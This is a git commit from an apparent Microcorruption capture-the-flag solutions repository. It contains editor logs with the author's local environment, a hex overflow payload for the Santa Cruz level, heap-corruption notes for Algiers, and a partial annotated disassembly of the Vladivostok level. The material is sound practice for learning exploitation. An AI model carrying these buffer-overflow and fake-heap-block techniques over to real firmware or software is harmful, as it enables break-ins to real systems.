mirror of
https://git.soft.fish/val/MicroCorruption.git
synced 2025-01-18 13:15:59 +00:00
Initial Commit
This commit is contained in:
commit
9281acc1eb
14
.gitignore
vendored
Normal file
14
.gitignore
vendored
Normal file
@ -0,0 +1,14 @@
|
|||||||
|
# Microcorruption save files
|
||||||
|
Saves
|
||||||
|
|
||||||
|
# Dependency and object files
|
||||||
|
**/dep
|
||||||
|
**/obj
|
||||||
|
**/*.out
|
||||||
|
|
||||||
|
# MSProbe - https://github.com/Swiftloke/MSProbe
|
||||||
|
MSProbe
|
||||||
|
|
||||||
|
# Python cache
|
||||||
|
__pycache__
|
||||||
|
**/__pycache__
|
1
.vscode/configurationCache.log
vendored
Normal file
1
.vscode/configurationCache.log
vendored
Normal file
@ -0,0 +1 @@
|
|||||||
|
{"buildTargets":[],"launchTargets":[],"customConfigurationProvider":{"workspaceBrowse":{"browsePath":[],"compilerArgs":[]},"fileIndex":[]}}
|
6
.vscode/dryrun.log
vendored
Normal file
6
.vscode/dryrun.log
vendored
Normal file
@ -0,0 +1,6 @@
|
|||||||
|
make --dry-run --keep-going --print-directory
|
||||||
|
make: Entering directory '/mnt/c/Users/valli/Documents/MicroCorruption'
|
||||||
|
make: Leaving directory '/mnt/c/Users/valli/Documents/MicroCorruption'
|
||||||
|
|
||||||
|
make: *** No targets specified and no makefile found. Stop.
|
||||||
|
|
3
.vscode/settings.json
vendored
Normal file
3
.vscode/settings.json
vendored
Normal file
@ -0,0 +1,3 @@
|
|||||||
|
{
|
||||||
|
"makefile.extensionOutputFolder": "./.vscode"
|
||||||
|
}
|
242
.vscode/targets.log
vendored
Normal file
242
.vscode/targets.log
vendored
Normal file
@ -0,0 +1,242 @@
|
|||||||
|
make all --print-data-base --no-builtin-variables --no-builtin-rules --question
|
||||||
|
make: *** No rule to make target 'all'. Stop.
|
||||||
|
|
||||||
|
# GNU Make 4.3
|
||||||
|
# Built for x86_64-pc-linux-gnu
|
||||||
|
# Copyright (C) 1988-2020 Free Software Foundation, Inc.
|
||||||
|
# License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
|
||||||
|
# This is free software: you are free to change and redistribute it.
|
||||||
|
# There is NO WARRANTY, to the extent permitted by law.
|
||||||
|
|
||||||
|
# Make data base, printed on Sat Aug 6 01:00:38 2022
|
||||||
|
|
||||||
|
# Variables
|
||||||
|
|
||||||
|
# environment
|
||||||
|
LC_ALL = C
|
||||||
|
# environment
|
||||||
|
PULSE_SERVER = /mnt/wslg/PulseServer
|
||||||
|
# environment
|
||||||
|
WSLENV = VSCODE_WSL_EXT_LOCATION/up:VSCODE_SERVER_TAR/up
|
||||||
|
# environment
|
||||||
|
VSCODE_CWD = /mnt/c/Users/valli/AppData/Local/Programs/Microsoft VS Code
|
||||||
|
# environment
|
||||||
|
NVM_DIR = /home/val/.nvm
|
||||||
|
# default
|
||||||
|
MAKE_COMMAND := make
|
||||||
|
# environment
|
||||||
|
VSCODE_HANDLES_SIGPIPE = true
|
||||||
|
# automatic
|
||||||
|
@D = $(patsubst %/,%,$(dir $@))
|
||||||
|
# environment
|
||||||
|
VSCODE_HANDLES_UNCAUGHT_ERRORS = true
|
||||||
|
# default
|
||||||
|
.VARIABLES :=
|
||||||
|
# environment
|
||||||
|
PWD = /mnt/c/Users/valli/Documents/MicroCorruption
|
||||||
|
# automatic
|
||||||
|
%D = $(patsubst %/,%,$(dir $%))
|
||||||
|
# environment
|
||||||
|
LSCOLORS = Gxfxcxdxbxegedabagacad
|
||||||
|
# environment
|
||||||
|
OLDPWD = /mnt/c/Users/valli/AppData/Local/Programs/Microsoft VS Code
|
||||||
|
# automatic
|
||||||
|
^D = $(patsubst %/,%,$(dir $^))
|
||||||
|
# automatic
|
||||||
|
%F = $(notdir $%)
|
||||||
|
# environment
|
||||||
|
NVM_INC = /home/val/.nvm/versions/node/v16.13.0/include/node
|
||||||
|
# environment
|
||||||
|
LANG = C
|
||||||
|
# default
|
||||||
|
.LOADED :=
|
||||||
|
# default
|
||||||
|
.INCLUDE_DIRS = /usr/include /usr/local/include /usr/include
|
||||||
|
# makefile
|
||||||
|
MAKEFLAGS = pqrR
|
||||||
|
# environment
|
||||||
|
DEVKITARM = /opt/devkitpro/devkitARM
|
||||||
|
# makefile
|
||||||
|
CURDIR := /mnt/c/Users/valli/Documents/MicroCorruption
|
||||||
|
# environment
|
||||||
|
APPLICATION_INSIGHTS_NO_DIAGNOSTIC_CHANNEL = true
|
||||||
|
# automatic
|
||||||
|
*D = $(patsubst %/,%,$(dir $*))
|
||||||
|
# environment
|
||||||
|
MFLAGS = -pqrR
|
||||||
|
# default
|
||||||
|
.SHELLFLAGS := -c
|
||||||
|
# environment
|
||||||
|
NVM_BIN = /home/val/.nvm/versions/node/v16.13.0/bin
|
||||||
|
# environment
|
||||||
|
WSL2_GUI_APPS_ENABLED = 1
|
||||||
|
# environment
|
||||||
|
WAYLAND_DISPLAY = wayland-0
|
||||||
|
# automatic
|
||||||
|
+D = $(patsubst %/,%,$(dir $+))
|
||||||
|
# makefile
|
||||||
|
MAKEFILE_LIST :=
|
||||||
|
# automatic
|
||||||
|
@F = $(notdir $@)
|
||||||
|
# environment
|
||||||
|
ZSH = /home/val/.oh-my-zsh
|
||||||
|
# automatic
|
||||||
|
?D = $(patsubst %/,%,$(dir $?))
|
||||||
|
# environment
|
||||||
|
DEVKITPPC = /opt/devkitpro/devkitPPC
|
||||||
|
# automatic
|
||||||
|
*F = $(notdir $*)
|
||||||
|
# automatic
|
||||||
|
<D = $(patsubst %/,%,$(dir $<))
|
||||||
|
# environment
|
||||||
|
VSCODE_NLS_CONFIG = {"locale":"en","availableLanguages":{}}
|
||||||
|
# default
|
||||||
|
MAKE_HOST := x86_64-pc-linux-gnu
|
||||||
|
# makefile
|
||||||
|
SHELL = /bin/sh
|
||||||
|
# default
|
||||||
|
MAKECMDGOALS := all
|
||||||
|
# environment
|
||||||
|
SHLVL = 2
|
||||||
|
# environment
|
||||||
|
MAKELEVEL := 0
|
||||||
|
# default
|
||||||
|
MAKE = $(MAKE_COMMAND)
|
||||||
|
# environment
|
||||||
|
PATH = /home/val/.vscode-server/bin/da76f93349a72022ca4670c1b84860304616aaa2/bin/remote-cli:/home/val/.nvm/versions/node/v16.13.0/bin:/opt/devkitpro/tools/bin:/home/val/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/usr/lib/wsl/lib:/mnt/c/WINDOWS/system32:/mnt/c/WINDOWS:/mnt/c/WINDOWS/System32/Wbem:/mnt/c/WINDOWS/System32/WindowsPowerShell/v1.0/:/mnt/c/WINDOWS/System32/OpenSSH/:/mnt/c/Program Files/dotnet/:/mnt/c/Program Files/WireGuard/:/mnt/c/Program Files/Calibre2/:/mnt/c/ProgramData/chocolatey/bin:/mnt/c/Program Files/usbipd-win/:/mnt/c/Program Files/Git/cmd:/mnt/c/Program Files (x86)/GnuPG/bin:/mnt/c/Users/valli/AppData/Local/Programs/Python/Python310/Scripts/:/mnt/c/Users/valli/AppData/Local/Programs/Python/Python310/:/mnt/c/Python310/Scripts/:/mnt/c/Python310/:/mnt/c/Users/valli/AppData/Local/Microsoft/WindowsApps:/mnt/c/Users/valli/AppData/Local/Programs/Microsoft VS Code/bin:/mnt/c/Users/valli/Programs/platform-tools:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl
|
||||||
|
# default
|
||||||
|
MAKEFILES :=
|
||||||
|
# automatic
|
||||||
|
^F = $(notdir $^)
|
||||||
|
# automatic
|
||||||
|
?F = $(notdir $?)
|
||||||
|
# environment
|
||||||
|
NAME = framework
|
||||||
|
# environment
|
||||||
|
DEVKITPRO = /opt/devkitpro
|
||||||
|
# environment
|
||||||
|
VSCODE_SERVER_TAR = /mnt/c/Users/valli/AppData/Local/Temp/vscode-remote-wsl/da76f93349a72022ca4670c1b84860304616aaa2/vscode-server-stable-linux-x64.tar.gz
|
||||||
|
# environment
|
||||||
|
HOSTTYPE = x86_64
|
||||||
|
# environment
|
||||||
|
LS_COLORS = rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
|
||||||
|
# automatic
|
||||||
|
+F = $(notdir $+)
|
||||||
|
# environment
|
||||||
|
LESS = -R
|
||||||
|
# environment
|
||||||
|
WSL_INTEROP = /run/WSL/13_interop
|
||||||
|
# 'override' directive
|
||||||
|
GNUMAKEFLAGS :=
|
||||||
|
# environment
|
||||||
|
LOGNAME = val
|
||||||
|
# environment
|
||||||
|
VSCODE_WSL_EXT_LOCATION = /mnt/c/Users/valli/.vscode/extensions/ms-vscode-remote.remote-wsl-0.66.3
|
||||||
|
# makefile
|
||||||
|
.DEFAULT_GOAL :=
|
||||||
|
# environment
|
||||||
|
DISPLAY = :0
|
||||||
|
# environment
|
||||||
|
USER = val
|
||||||
|
# default
|
||||||
|
MAKE_VERSION := 4.3
|
||||||
|
# environment
|
||||||
|
PAGER = less
|
||||||
|
# environment
|
||||||
|
_ = /usr/sbin/make
|
||||||
|
# environment
|
||||||
|
XDG_RUNTIME_DIR = /mnt/wslg/runtime-dir
|
||||||
|
# environment
|
||||||
|
LC_CTYPE =
|
||||||
|
# environment
|
||||||
|
VSCODE_IPC_HOOK_CLI = /mnt/wslg/runtime-dir/vscode-ipc-84aeb54a-2a55-4133-82f0-e02f6af1e278.sock
|
||||||
|
# environment
|
||||||
|
NVM_CD_FLAGS = -q
|
||||||
|
# environment
|
||||||
|
VSCODE_AMD_ENTRYPOINT = vs/workbench/api/node/extensionHostProcess
|
||||||
|
# environment
|
||||||
|
HOME = /home/val
|
||||||
|
# environment
|
||||||
|
ELECTRON_RUN_AS_NODE = 1
|
||||||
|
# environment
|
||||||
|
TERM = xterm-256color
|
||||||
|
# default
|
||||||
|
.RECIPEPREFIX :=
|
||||||
|
# automatic
|
||||||
|
<F = $(notdir $<)
|
||||||
|
# default
|
||||||
|
SUFFIXES :=
|
||||||
|
# environment
|
||||||
|
WSL_DISTRO_NAME = Manjaro
|
||||||
|
# default
|
||||||
|
.FEATURES := target-specific order-only second-expansion else-if shortest-stem undefine oneshell nocomment grouped-target extra-prereqs archives jobserver output-sync check-symlink guile load
|
||||||
|
# variable set hash-table stats:
|
||||||
|
# Load=79/1024=8%, Rehash=0, Collisions=1/106=1%
|
||||||
|
|
||||||
|
# Pattern-specific Variable Values
|
||||||
|
|
||||||
|
# No pattern-specific variable values.
|
||||||
|
|
||||||
|
# Directories
|
||||||
|
|
||||||
|
# . (device 72, inode 7881299347912784): 24 files, no impossibilities.
|
||||||
|
|
||||||
|
# 24 files, no impossibilities in 1 directories.
|
||||||
|
|
||||||
|
# Implicit Rules
|
||||||
|
|
||||||
|
# No implicit rules.
|
||||||
|
|
||||||
|
# Files
|
||||||
|
|
||||||
|
# Not a target:
|
||||||
|
Makefile:
|
||||||
|
# Implicit rule search has been done.
|
||||||
|
# File does not exist.
|
||||||
|
# File has been updated.
|
||||||
|
# Failed to be updated.
|
||||||
|
|
||||||
|
# Not a target:
|
||||||
|
.DEFAULT:
|
||||||
|
# Implicit rule search has not been done.
|
||||||
|
# Modification time never checked.
|
||||||
|
# File has not been updated.
|
||||||
|
|
||||||
|
# Not a target:
|
||||||
|
all:
|
||||||
|
# Command line target.
|
||||||
|
# Implicit rule search has been done.
|
||||||
|
# File does not exist.
|
||||||
|
# File has not been updated.
|
||||||
|
|
||||||
|
# Not a target:
|
||||||
|
makefile:
|
||||||
|
# Implicit rule search has been done.
|
||||||
|
# File does not exist.
|
||||||
|
# File has been updated.
|
||||||
|
# Failed to be updated.
|
||||||
|
|
||||||
|
# Not a target:
|
||||||
|
GNUmakefile:
|
||||||
|
# Implicit rule search has been done.
|
||||||
|
# File does not exist.
|
||||||
|
# File has been updated.
|
||||||
|
# Failed to be updated.
|
||||||
|
|
||||||
|
# files hash-table stats:
|
||||||
|
# Load=6/1024=1%, Rehash=0, Collisions=0/15=0%
|
||||||
|
# VPATH Search Paths
|
||||||
|
|
||||||
|
# No 'vpath' search paths.
|
||||||
|
|
||||||
|
# No general ('VPATH' variable) search path.
|
||||||
|
|
||||||
|
# strcache buffers: 1 (0) / strings = 32 / storage = 508 B / avg = 15 B
|
||||||
|
# current buf: size = 8162 B / used = 508 B / count = 32 / avg = 15 B
|
||||||
|
|
||||||
|
# strcache performance: lookups = 35 / hit rate = 8%
|
||||||
|
# hash-table stats:
|
||||||
|
# Load=32/8192=0%, Rehash=0, Collisions=0/35=0%
|
||||||
|
# Finished Make data base on Sat Aug 6 01:00:38 2022
|
||||||
|
|
||||||
|
|
6
09 - Santa Cruz/Santa Cruz notes
Normal file
6
09 - Santa Cruz/Santa Cruz notes
Normal file
@ -0,0 +1,6 @@
|
|||||||
|
|
||||||
|
password:
|
||||||
|
passwordpassword1
|
||||||
|
|
||||||
|
username:
|
||||||
|
2020202020202020202020202020202020017f20202020202020202020202020202020202020202020204a44
|
50
13 - Algiers/Algiers notes
Normal file
50
13 - Algiers/Algiers notes
Normal file
@ -0,0 +1,50 @@
|
|||||||
|
|
||||||
|
//[*prev][*next][size:15][final:1]
|
||||||
|
|
||||||
|
struct block {
|
||||||
|
block * prev:16;
|
||||||
|
block * next:16;
|
||||||
|
short len :15;
|
||||||
|
bool end :01;
|
||||||
|
};
|
||||||
|
|
||||||
|
If the username is "usernameusername" + prev + &password + '0001'
|
||||||
|
then the password can be a fake block w/ a next pointer to an
|
||||||
|
|
||||||
|
2408: 0824 1e24 2100 # Block
|
||||||
|
2408[0] 0824: 2408 == (prev pointer?)
|
||||||
|
2408[2] 1e24: 241e == next pointer
|
||||||
|
2408[4] 2100: 0021 == 2 * block_size + 1
|
||||||
|
2408[6] data[0..bs]
|
||||||
|
|
||||||
|
Heap (0 malloc)
|
||||||
|
2400: 0824 0010 0100 0000 0000 0000 0000 0000 .$..............
|
||||||
|
Word 1: 2408 == &(heap_start)
|
||||||
|
Word 2: 1000 == total heap BYTES
|
||||||
|
Word 3: 0001 == needs_initialize
|
||||||
|
Word 4: 0000 == ???
|
||||||
|
|
||||||
|
|
||||||
|
Heap (1 malloc)
|
||||||
|
2400: 0824 0010 0000 0000 0824 1e24 2100 0000 .$.......$.$!...
|
||||||
|
2410: 0000 0000 0000 0000 0000 0000 0000 0824 ...............$
|
||||||
|
2420: 0824 c81f 0000 0000 0000 0000 0000 0000 .$..............
|
||||||
|
|
||||||
|
2408: 0824 1e24 2100 # Block
|
||||||
|
2408[0] 0824: 2408 == (prev pointer?)
|
||||||
|
2408[2] 1e24: 241e == next pointer
|
||||||
|
2408[4] 2100: 0021 == 2 * block_size + 1
|
||||||
|
2408[6] data[0..bs]
|
||||||
|
|
||||||
|
241e: 0824 0824 c81f # End block
|
||||||
|
241e[0] 0824: prev pointer
|
||||||
|
241e[2] 0824: next pointer
|
||||||
|
241e[4] c81f: 1fc8 == 2*(size of free space)
|
||||||
|
241e[6] free space
|
||||||
|
|
||||||
|
Heap (2 malloc)
|
||||||
|
2400: 0824 0010 0000 0000 0824 1e24 2100 0000 .$.......$.$!...
|
||||||
|
2410: 0000 0000 0000 0000 0000 0000 0000 0824 ...............$
|
||||||
|
2420: 3424 2100 0000 0000 0000 0000 0000 0000 4$!.............
|
||||||
|
2430: 0000 0000 1e24 0824 9c1f 0000 0000 0000 .....$.$........
|
||||||
|
|
753
14 - Vladivostok/Vladivostok.asm
Normal file
753
14 - Vladivostok/Vladivostok.asm
Normal file
@ -0,0 +1,753 @@
|
|||||||
|
.msp430
|
||||||
|
0010 <__trap_interrupt>
|
||||||
|
0010: 3041 ret
|
||||||
|
|
||||||
|
; Only runs once
|
||||||
|
4400 <__init_stack>
|
||||||
|
4400: 3140 0044 mov #0x4400, sp
|
||||||
|
4404 <__low_level_init>
|
||||||
|
4404: 1542 5c01 mov &0x015c, r5
|
||||||
|
4408: 75f3 and.b #-0x1, r5
|
||||||
|
440a: 35d0 085a bis #0x5a08, r5
|
||||||
|
440e <__do_copy_data>
|
||||||
|
440e: 3f40 0000 clr r15
|
||||||
|
4412: 0f93 tst r15
|
||||||
|
4414: 0724 jz $+0x10 <__do_clear_bss+0x0>
|
||||||
|
4416: 8245 5c01 mov r5, &0x015c
|
||||||
|
441a: 2f83 decd r15
|
||||||
|
; 4170 contains only zeroes
|
||||||
|
441c: 9f4f 704a 0024 mov 0x4a70(r15), 0x2400(r15)
|
||||||
|
4422: f923 jnz $-0xc <__do_copy_data+0x8>
|
||||||
|
4424 <__do_clear_bss>
|
||||||
|
4424: 3f40 3200 mov #0x32, r15
|
||||||
|
4428: 0f93 tst r15
|
||||||
|
442a: 0624 jz $+0xe <main+0x0>
|
||||||
|
442c: 8245 5c01 mov r5, &0x015c
|
||||||
|
4430: 1f83 dec r15
|
||||||
|
4432: cf43 0024 mov.b #0x0, 0x2400(r15)
|
||||||
|
4436: fa23 jnz $-0xa <__do_clear_bss+0x8>
|
||||||
|
|
||||||
|
rand_base_0x038: <main>
|
||||||
|
main:
|
||||||
|
4438: b012 1c4a call #0x4a1c <rand> ; get rand_base
|
||||||
|
443c: 0b4f mov r15, r11
|
||||||
|
443e: 3bf0 fe7f and #0x7ffe, r11
|
||||||
|
4442: 3b50 0060 add #0x6000, r11
|
||||||
|
4446: b012 1c4a call #0x4a1c <rand>
|
||||||
|
444a: 0a4f mov r15, r10
|
||||||
|
; Copy 0x1000 bytes from 0x4400 to rand_base
|
||||||
|
444c: 3012 0010 push #0x1000
|
||||||
|
4450: 3012 0044 push #0x4400
|
||||||
|
4454: 0b12 push r11
|
||||||
|
4456: b012 e849 call #0x49e8 <_memcpy>
|
||||||
|
445a: 3150 0600 add #0x6, sp
|
||||||
|
|
||||||
|
445e: 0f4a mov r10, r15
|
||||||
|
4460: 3ff0 fe0f and #0xffe, r15
|
||||||
|
4464: 0e4b mov r11, r14
|
||||||
|
4466: 0e8f sub r15, r14
|
||||||
|
4468: 3e50 00ff add #0xff00, r14
|
||||||
|
446c: 0d4b mov r11, r13
|
||||||
|
446e: 3d50 5c03 add #0x35c, r13
|
||||||
|
4472: 014e mov r14, sp
|
||||||
|
4474: 0f4b mov r11, r15
|
||||||
|
4476: 8d12 call r13
|
||||||
|
|
||||||
|
rand_base_0x078: <__stop_progExec__>
|
||||||
|
4478: 32d0 f000 bis #0xf0, sr
|
||||||
|
447c: fd3f jmp $-0x4 <__stop_progExec__+0x0>
|
||||||
|
|
||||||
|
rand_base_0x07e: <__ctors_end>
|
||||||
|
447e: 3040 6e4a br #0x4a6e <_unexpected_>
|
||||||
|
|
||||||
|
rand_base_0x082: <_aslr_main>
|
||||||
|
_aslr_main: ;! args: r15
|
||||||
|
push r11
|
||||||
|
push r10
|
||||||
|
; Eight more bytes on stack
|
||||||
|
sub #0x8, sp
|
||||||
|
mov r15, r12
|
||||||
|
add #0x36a, r12
|
||||||
|
mov r12, 0x2(sp)
|
||||||
|
|
||||||
|
clr r14
|
||||||
|
__delete_code_loop:
|
||||||
|
mov.b #0x0, 0x4400(r14)
|
||||||
|
inc r14
|
||||||
|
cmp #0x1000, r14
|
||||||
|
jnz $-0xa <__delete_code_loop>
|
||||||
|
|
||||||
|
; "Username (8 char max):" -> 0x2402
|
||||||
|
mov.b #0x55, &0x2402
|
||||||
|
mov.b #0x73, &0x2403
|
||||||
|
mov.b #0x65, &0x2404
|
||||||
|
mov.b #0x72, &0x2405
|
||||||
|
mov.b #0x6e, &0x2406
|
||||||
|
mov.b #0x61, &0x2407
|
||||||
|
mov.b #0x6d, &0x2408
|
||||||
|
mov.b #0x65, &0x2409
|
||||||
|
mov.b #0x20, &0x240a
|
||||||
|
mov.b #0x28, &0x240b
|
||||||
|
mov.b #0x38, &0x240c
|
||||||
|
mov.b #0x20, &0x240d
|
||||||
|
mov.b #0x63, &0x240e
|
||||||
|
mov.b #0x68, &0x240f
|
||||||
|
mov.b #0x61, &0x2410
|
||||||
|
mov.b #0x72, &0x2411
|
||||||
|
mov.b #0x20, &0x2412
|
||||||
|
mov.b #0x6d, &0x2413
|
||||||
|
mov.b #0x61, &0x2414
|
||||||
|
mov.b #0x78, &0x2415
|
||||||
|
mov.b #0x29, &0x2416
|
||||||
|
mov.b #0x3a, &0x2417
|
||||||
|
mov.b #0x0, &0x2418
|
||||||
|
mov #0x17, &0x2400
|
||||||
|
mov #0x2402, r14
|
||||||
|
clr r11
|
||||||
|
jmp $+0x22 <print_uname_string>
|
||||||
|
; Print the uname string bytewise
|
||||||
|
__print_uname_string_l:
|
||||||
|
inc r14
|
||||||
|
sxt r13
|
||||||
|
push r11
|
||||||
|
push r13
|
||||||
|
push r11
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r11, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
print_uname_string:
|
||||||
|
mov.b @r14, r13
|
||||||
|
tst.b r13
|
||||||
|
jnz $-0x24 <__print_uname_string_l>
|
||||||
|
|
||||||
|
; Print newline
|
||||||
|
__print_line_feed__1: ; putchar
|
||||||
|
clr r14
|
||||||
|
mov #0xa, r13
|
||||||
|
push r14
|
||||||
|
push r13
|
||||||
|
push r14
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r14, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
|
||||||
|
;* Print ">>"
|
||||||
|
__print_less_than__1: ; putchar
|
||||||
|
add #0x34, r13
|
||||||
|
push r14
|
||||||
|
push r13
|
||||||
|
push r14
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r14, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
__print_less_than__2: ; putchar
|
||||||
|
push r14
|
||||||
|
push r13
|
||||||
|
push r14
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r14, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
|
||||||
|
;! Gets 8 bytes of user input -> &0x2426
|
||||||
|
__get_uname_string: ; getsn
|
||||||
|
mov #0x8, r10
|
||||||
|
mov #0x2426, r11
|
||||||
|
mov #0x2, r13
|
||||||
|
push r10
|
||||||
|
push r11
|
||||||
|
push r13
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r13, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10 ; INT (2, 0x2426, 0x8)
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
|
||||||
|
|
||||||
|
; Calls r15+0x36a
|
||||||
|
mov.b r14, &0x242e
|
||||||
|
push r11
|
||||||
|
call r12 ;! PRINTF???
|
||||||
|
incd sp
|
||||||
|
mov r11, r15
|
||||||
|
|
||||||
|
jmp $+0x8 <clsb_a>
|
||||||
|
__clsb_a_loop:
|
||||||
|
mov.b #0x0, 0x0(r15)
|
||||||
|
inc r15
|
||||||
|
clsb_a:
|
||||||
|
cmp #0x2432, r15
|
||||||
|
jnz $-0xa <__clsb_a_loop>
|
||||||
|
|
||||||
|
;! "Password:" -> 0x2403
|
||||||
|
mov.b #0xa, &0x2402 ; length 10
|
||||||
|
mov.b #0x50, &0x2403
|
||||||
|
mov.b #0x61, &0x2404
|
||||||
|
mov.b #0x73, &0x2405
|
||||||
|
mov.b #0x73, &0x2406
|
||||||
|
mov.b #0x77, &0x2407
|
||||||
|
mov.b #0x6f, &0x2408
|
||||||
|
mov.b #0x72, &0x2409
|
||||||
|
mov.b #0x64, &0x240a
|
||||||
|
mov.b #0x3a, &0x240b
|
||||||
|
mov.b #0x0, &0x240c
|
||||||
|
mov #0x2402, r14 ; r14 = &length
|
||||||
|
|
||||||
|
; puts ("Password:")
|
||||||
|
clr r12
|
||||||
|
jmp $+0x22 <print_passwd_string>
|
||||||
|
__print_passwd_string:
|
||||||
|
inc r14
|
||||||
|
sxt r13
|
||||||
|
push r12
|
||||||
|
push r13
|
||||||
|
push r12
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r12, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10 ; INT (0, r13)
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
print_passwd_string:
|
||||||
|
mov.b @r14, r13
|
||||||
|
tst.b r13
|
||||||
|
jnz $-0x24 <__print_passwd_string>
|
||||||
|
clr r14
|
||||||
|
mov #0xa, r13
|
||||||
|
push r14
|
||||||
|
push r13
|
||||||
|
push r14
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r14, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
|
||||||
|
;! Get password from user -> STACK
|
||||||
|
__get_pass_string: ; getsn
|
||||||
|
mov sp, r11
|
||||||
|
add #0x4, r11
|
||||||
|
mov #0x14, r12
|
||||||
|
mov #0x2, r13
|
||||||
|
push r12
|
||||||
|
push r11
|
||||||
|
push r13
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r13, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10 ; INT (2, )
|
||||||
|
0x2aa:
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
|
||||||
|
;! Check password with HSM-2
|
||||||
|
__check_password: ; conditional_unlock_door
|
||||||
|
add #0x7c, r13
|
||||||
|
mov sp, r12
|
||||||
|
push r12
|
||||||
|
push r11
|
||||||
|
push r13
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r13, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
|
||||||
|
; "Wrong!" -> 0x2402
|
||||||
|
mov.b #0x57, &0x2402
|
||||||
|
mov.b #0x72, &0x2403
|
||||||
|
mov.b #0x6f, &0x2404
|
||||||
|
mov.b #0x6e, &0x2405
|
||||||
|
mov.b #0x67, &0x2406
|
||||||
|
mov.b #0x21, &0x2407
|
||||||
|
mov.b r14, &0x2408 ; Hah, nice hint: r14 still 0
|
||||||
|
mov #0x7, &0x2400 ; length: 7
|
||||||
|
|
||||||
|
;* puts
|
||||||
|
mov #0x2402, r13
|
||||||
|
jmp $+0x22 <_aslr_main+0x2a2>
|
||||||
|
__print_wrong_string: ; puts ("Wrong!")
|
||||||
|
inc r13
|
||||||
|
sxt r12
|
||||||
|
push r14
|
||||||
|
push r12
|
||||||
|
push r14
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r14, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
